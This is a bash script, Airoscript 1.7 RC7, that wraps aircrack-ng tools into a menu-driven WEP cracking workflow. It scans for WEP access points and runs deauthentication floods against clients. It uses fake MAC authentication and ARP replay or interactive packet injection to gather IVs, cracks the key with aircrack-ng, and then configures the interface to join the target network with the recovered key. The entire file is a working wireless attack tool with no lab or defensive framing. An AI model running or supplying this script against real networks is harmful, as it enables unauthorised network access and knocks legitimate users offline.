#! /bin/sh # Program: Airoscript # Author: Base Code by Daouid & Mods and Tweaks by CurioCT # Date: 19.09.2006 # Version: 1.7 RC7 # Dependencies: aircrack-ng, xterm (needs an X Window System), grep, awk, drivers capable of injection. # This is the interface you want to use to perform the attack # If you dont set this, airoscript will ask you for interface to use WIFI="rausb0" # This is the rate per second at wich packets will be injected INJECTRATE="1000" # How many times the deauth attack is run DEAUTHTIME="5" # Time between re-association with target AP AUTHDELAY="25" # Fudge factor setting FUDGEFACTOR="2" # Path to binaries AIRMON="airmon-ng" AIRODUMP="airodump-ng" AIREPLAY="aireplay-ng" AIRCRACK="aircrack-ng" # The path where the data is stored (FOLDER MUST EXIST !) DUMP_PATH="/tmp" # The Mac address used to associate with AP FAKE_MAC="00:01:02:03:04:05" # Set this to 1 to enable debugging of script DEBUG="0" CHOICES="1 2 3 4 5 6 7 8 9 10 11 12 13 14 15" ######################################### # Functions function monitor_interface { IS_MONITOR=`$AIRMON start $WIFI |grep monitor` clear echo $IS_MONITOR } function setinterface { INTERFACES=`iwconfig | grep ESSID | awk '{ print $1 }'| grep -v lo | grep -v inet*` clear if [ $WIFI = ] then echo "Choose wich network interface you would like to use:" echo " " select WIFI in $INTERFACES; do break; done clear echo "Interface set to: $WIFI" else clear fi } function debug { clear if [ $DEBUG = 1 ] then echo "Debug Mode On" echo " " HOLD="-hold" clear else HOLD="" clear fi } function aircrackversioncheck { rm -rf $DUMP_PATH/aircrackout.txt aircrack-ng >$DUMP_PATH/aircrackout.txt acversion=`more $DUMP_PATH/aircrackout.txt | grep Aircrack-ng | awk '{ print $2 }'` if [ "$acversion" = "0.6.1" ] then acv="1" elif [ "$acversion" = "0.6" ] then acv="1" else acv="2" fi } function blankssid { while true; do clear echo "" echo "A Blank SSID has been detected would you like to manually configure the SSID?" echo "" echo "1) Yes " echo "2) No " read yn echo "" case $yn in 1 ) Host_ssidinput ; break ;; 2 ) Host_SSID="" ; break ;; * ) echo "unknown response. Try again" ;; esac done } function Host_ssidinput { echo -n "OK, now type in the ESSID " read Host_SSID echo You typed $Host_SSID set -- ${Host_SSID} clear } function Scan { clear rm -rf $DUMP_PATH/dump* xterm $HOLD -title "Scanning for targets" -geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -w $DUMP_PATH/dump -c 0 $WIFI } function clientdetect { clear rm -rf $DUMP_PATH/dump* xterm $HOLD -title "Scanning for targets" -geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -w $DUMP_PATH/dump -c $Host_CHAN $WIFI & xterm $HOLD -geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" -title "Sending Deauth Packets to: $Host_MAC" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI } function Scanchan { GetAnswer () { prompt=$1 echo -n $prompt read answer return $answer } echo " " GetAnswer "On which channel would you like to scan ? ==> _" channel_number=$? clear rm -rf $DUMP_PATH/dump* xterm $HOLD -title "Scanning for targets on channel $channel_number" -geometry 100x50+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -w $DUMP_PATH/dump -c $channel_number $WIFI } function Parseforap { HOST=`cat $DUMP_PATH/dump-01.txt | grep WEP | awk '{ print $1 $6 $16}'| grep -v 00:00:00:00:00:00| grep -v 00:00:00:00:00| grep -v 00:00:00:00` clear echo "Select target" echo "" select TARGET in $HOST; do export Host_MAC=` echo $TARGET | awk '{ split($1, info, "," ) print info[1] }' ` export Host_CHAN=` echo $TARGET | awk '{ split($1, info, "," ) print info[2] }' ` export Host_SSID=` echo $TARGET | awk '{ split($1, info, "," ) print info[3] }' ` break; done } function Parseforap2 { HOST=`cat $DUMP_PATH/dump-01.txt | grep WEP | awk '{ print $1 $6 $17}'| grep -v 00:00:00:00:00:00| grep -v 00:00:00:00:00| grep -v 00:00:00:00` clear echo "Select target" echo "" select TARGET in $HOST; do export Host_MAC=` echo $TARGET | awk '{ split($1, info, "," ) print info[1] }' ` export Host_CHAN=` echo $TARGET | awk '{ split($1, info, "," ) print info[2] }' ` export Host_SSID=` echo $TARGET | awk '{ split($1, info, "," ) print info[3] }' ` break; done } function choosewep { while true; do clear echo "" echo "How was your target listed in airodump-ng? (WEP or WEP?)" echo "" echo "1) WEP " echo "2) WEP?" read yn echo "" case $yn in 1 ) Parseforap2 ; break ;; 2 ) Parseforap ; break ;; * ) echo "unknown response. Try again" ;; esac done } function choosescan { while true; do clear echo "Airodump will be launched in a new window, hit ctrl+c when target(s) is found" echo "" echo "Do you want to scan on multiple channels or on a specific channel?" echo "" echo "1) Channel Hoping " echo "2) Specific channel " read yn echo "" case $yn in 1 ) Scan ; break ;; 2 ) Scanchan ; break ;; * ) echo "unknown response. Try again" ;; esac done } function choosetarget { while true; do clear echo "" echo "Do you want to select a client now ?" echo "" echo "1) Yes " echo "2) No " echo "3) Try to detect associated client" read yn echo "" case $yn in 1 ) askclientsel ; break ;; 2 ) break ;; 3 ) clientdetect && clientfound ; break ;; * ) echo "unknown response. Try again" ;; esac done } function clientfound { while true; do clear echo "" echo "Did you find desired client?" echo "" echo "1) Yes " echo "2) No " read yn echo "" case $yn in 1 ) listsel2 ; break ;; 2 ) break ;; * ) echo "unknown response. Try again" ;; esac done } function choosedeauth { while true; do clear echo "" echo "What kind of deauth do you want to do ?" echo "" echo "1) Everybody " echo "2) Myself " echo "3) Selected Client" read yn echo "" case $yn in 1 ) de_auth ; break ;; 2 ) de_auth_fake ; break ;; 3 ) de_auth_client ; break ;; * ) echo "unknown response. Try again" ;; esac done } function solointeractiveattack { xterm $HOLD -title "Interactive Packet Sel on: $Host_SSID" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE & xterm $HOLD -title "Kicking $Client_MAC from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI } function attacktype { while true; do clear echo "" echo "Do you want perform attack using a fake mac or a selected client?" echo "" echo "1) Fake MAC" echo "2) Using selected client " echo "3) Interactive attack using selected client" echo "4) Interactive attack using Fake MAC" echo "5) Solo interactive attack (attempt to jump start stalled injections)" read yn echo "" case $yn in 1 ) attack ; break ;; 2 ) attackclient ; break ;; 3 ) interactiveattack ; break ;; 4 ) fakeinteractiveattack ; break ;; 5 ) solointeractiveattack ; break ;; * ) echo "unknown response. Try again" ;; esac done } function askclientsel { while true; do clear echo "" echo "Do you want to select the client from a list or enter MAC address manually ?" echo "" echo "1) Detected clients " echo "2) Manual Input " read yn echo "" case $yn in 1 ) asklistsel ; break ;; 2 ) clientinput ; break ;; * ) echo "unknown response. Try again" ;; esac done } function clientinput { echo -n "OK, now type in your client MAC: " read Client_MAC echo You typed: $Client_MAC set -- ${Client_MAC} } function asklistsel { while true; do clear echo "" echo "Do you want to select the client from full list or associated clients only ?" echo "1) Full list (All MAC detected, even Host are listed)" if [ "$Host_SSID" = $'\r' ] then Host_SSID="No SSID has been detected!" fi echo "2) Only associated clients (Client connected to this SSID : $Host_SSID)" echo read yn case $yn in 1 ) listsel1 ; break ;; 2 ) listsel2 ; break ;; * ) echo "unknown response. Try again" ;; esac done } function listsel1 { HOST=`cat $DUMP_PATH/dump-01.txt | grep "0.:..:..:..:.." | awk '{ print $1 }'| grep -v 00:00:00:00` clear echo "Select wich client you want to use for ARP replay" echo "" select CLIENT in $HOST; do export Client_MAC=` echo $CLIENT | awk '{ split($1, info, "," ) print info[1] }' ` break; done } function listsel2 { HOST=`cat $DUMP_PATH/dump-01.txt | grep $Host_MAC | awk '{ print $1 }'| grep -v 00:00:00:00| grep -v $Host_MAC` clear echo "Select which client you want to use for ARP replay" echo "" echo "The client(s) listed bellow is(are) connected to ==> "$Host_SSID echo "" select CLIENT in $HOST; do export Client_MAC=` echo $CLIENT | awk '{ split($1, info, "," ) print info[1] }' ` break; done } function cleanup { killall -9 aireplay-ng airodump-ng > /dev/null & ifconfig rausb0 down cardctl eject sleep 2 cardctl insert ifconfig rausb0 up $AIRMON start $WIFI $channel_number iwconfig $WIFI } function attack { rm -rf $DUMP_PATH/$Host_SSID* xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID & xterm $HOLD -title "Injection Thread" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE & xterm $HOLD -title "Associating with: $Host_SSID" -geometry 82x25-0-0 -bg "#000000" -fg "#FF0009" -e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI & xterm $HOLD -title "Kicking Ourself from: $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI } function attackclient { rm -rf $DUMP_PATH/$Host_SSID* xterm $HOLD -title "Capturing IVs from $Host_SSID with Airodump" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID & xterm $HOLD -title "Injection Thread Host : $Host_MAC CLient : $Client_MAC" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --arpreplay -b $Host_MAC -h $Client_MAC -x $INJECTRATE & xterm $HOLD -title "Kicking $Client_MAC from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI } function de_auth { xterm $HOLD -geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" -title "Sending Deauth Packets to: $Host_MAC" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI } function de_auth_fake { xterm $HOLD -geometry 84x25+0+600 -bg "#000000" -fg "#F2FF00" -title "Kicking Ourself from: $Host_SSID" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI } function de_auth_client { xterm $HOLD -geometry 84x25+0+600 -bg "#000000" -title "Kicking $Client_MAC from: $Host_SSID" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI } function fckauth { xterm $HOLD -geometry 82x25+600+600 -bg "#000000" -fg "#B60626" -title "Associating with $Host_SSID using $FAKE_MAC" -e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI } function interactiveattack { rm -rf $DUMP_PATH/$Host_SSID* xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID & xterm $HOLD -title "Interactive Packet Sel on: $Host_SSID" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68 & xterm $HOLD -title "Kicking $Client_MAC from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $WIFI } function fakeinteractiveattack { rm -rf $DUMP_PATH/$Host_SSID* xterm $HOLD -title "Capturing IVs from $Host_SSID" -geometry 84x25+0+0 -bg "#000000" -fg "#D7C5FF" -e $AIRODUMP --ivs -c $Host_CHAN $WIFI -w $DUMP_PATH/$Host_SSID & xterm $HOLD -title "Interactive Packet Sel on Host: $Host_SSID" -geometry 82x25-0+0 -bg "#000000" -fg "#1DFF00" -e $AIREPLAY $WIFI --interactive -b $Host_MAC -d FF:FF:FF:FF:FF:FF -x $INJECTRATE -t 1 -f 0 -m 68 -n 68 & xterm $HOLD -title "Fake association" -geometry 82x25-0-0 -bg "#000000" -fg "#FF0009" -e $AIREPLAY --fakeauth $AUTHDELAY -e $Host_SSID -a $Host_MAC -h $FAKE_MAC $WIFI & xterm $HOLD -title "Kicking Ourself from : $Host_SSID" -geometry 84x25+0-0 -bg "#000000" -fg "#F2FF00" -e $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $WIFI } function crack { if [ "$acv" = "1" ] then xterm $HOLD -geometry 84x25+0-0 -title "Aircracking this Access Point $Host_SSID" -hold -e $AIRCRACK -a 1 -b $Host_MAC -x1 -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_SSID-01.ivs else xterm $HOLD -geometry 84x25+0-0 -title "Aircracking this Access Point $Host_SSID" -hold -e $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_SSID-01.ivs fi } function menu { echo $acversion " is your aircrack-ng version number" echo "" echo "1. Scan ==> Launch a Scan to find targets" echo "2. Select ==> Select desired target: Host and Client" echo "3. Attack ==> Launch attack" echo "4. Crack ==> Starts searching for WEP key with aircrack" echo "5. Configure ==> Configure PC to connect using WEP key found and DHCP" echo "" echo "6. Associate ==> Try to associate to AP using a FAKE MAC" echo "7. Deauth ==> Disconnect desired station(s) from target" echo "8. Reset ==> Kills all airo-threads and reset card(pcmcia socket)" echo "9. Monitor ==> Enable monitor mode using airmon-ng" echo "10. Quit " echo " " } function target { clear echo "Selected target ==> "$Host_SSID echo "Has this MAC ==> "$Host_MAC echo "And is on channel ==> "$Host_CHAN } function configure { $AIRCRACK -a 1 -b $Host_MAC -x1 -f $FUDGEFACTOR -0 $DUMP_PATH/$Host_SSID-01.ivs &> $DUMP_PATH/$Host_SSID.key KEY=`cat $DUMP_PATH/$Host_SSID.key | grep KEY | awk '{ print $4 }'` echo "Using this key $KEY to connect to: $Host_SSID" echo "" echo "Setting: iwconfig $WIFI mode Managed" ifconfig $WIFI down sleep 3 ifconfig $WIFI up sleep 2 iwconfig $WIFI mode Managed ap any rate auto channel $Host_CHAN essid $Host_SSID key restricted $KEY sleep 1 echo "Setting: iwconfig $WIFI essid $Host_SSID" iwconfig $WIFI essid $Host_SSID echo "Setting: iwconfig $WIFI key $KEY" iwconfig $WIFI key restricted $KEY echo "Setting: dhcpcd $WIFI" sleep 1 iwconfig $WIFI rate auto iwconfig $WIFI ap any sleep 3 iwconfig $WIFI ap any rate auto mode Managed channel $Host_CHAN essid $Host_SSID key restricted $KEY sleep 3 dhcpcd $WIFI echo "Will now ping google.com" ping www.google.com } ######################################### # Main Section clear setinterface aircrackversioncheck debug menu select choix in $CHOICES; do if [ "$choix" = "1" ]; then choosescan clear menu echo "Airodump closed, now use option 2 to select target" echo " " elif [ "$choix" = "2" ]; then choosewep clear choosetarget if [ "$Host_SSID" = $'\r' ] then blankssid; target echo "Selected client ==> "$Client_MAC menu elif [ "$Host_SSID" = "No SSID has been detected!" ] then blankssid; target echo "Selected client ==> "$Client_MAC menu else target echo "Selected client ==> "$Client_MAC echo " " menu fi elif [ "$choix" = "3" ]; then attacktype clear echo "Attack starting with variables set to :" target echo "Selected client ==> "$Client_MAC sleep 2; menu elif [ "$choix" = "4" ]; then echo "launching aircrack, if aircrack shell closes quickly, try again with more IVs" crack menu elif [ "$choix" = "5" ]; then configure menu elif [ "$choix" = "6" ]; then echo launching fake auth commands fckauth & menu elif [ "$choix" = "7" ]; then choosedeauth menu elif [ "$choix" = "8" ]; then echo "Will restart pcmcia bus and kill all airodump-ng and aireplay-ng threads" cleanup menu elif [ "$choix" = "9" ]; then monitor_interface menu elif [ "$choix" = "10" ]; then echo Script terminated exit else clear menu echo " " echo "Wrong value, please try again without your boxing gloves on" echo " " fi done #END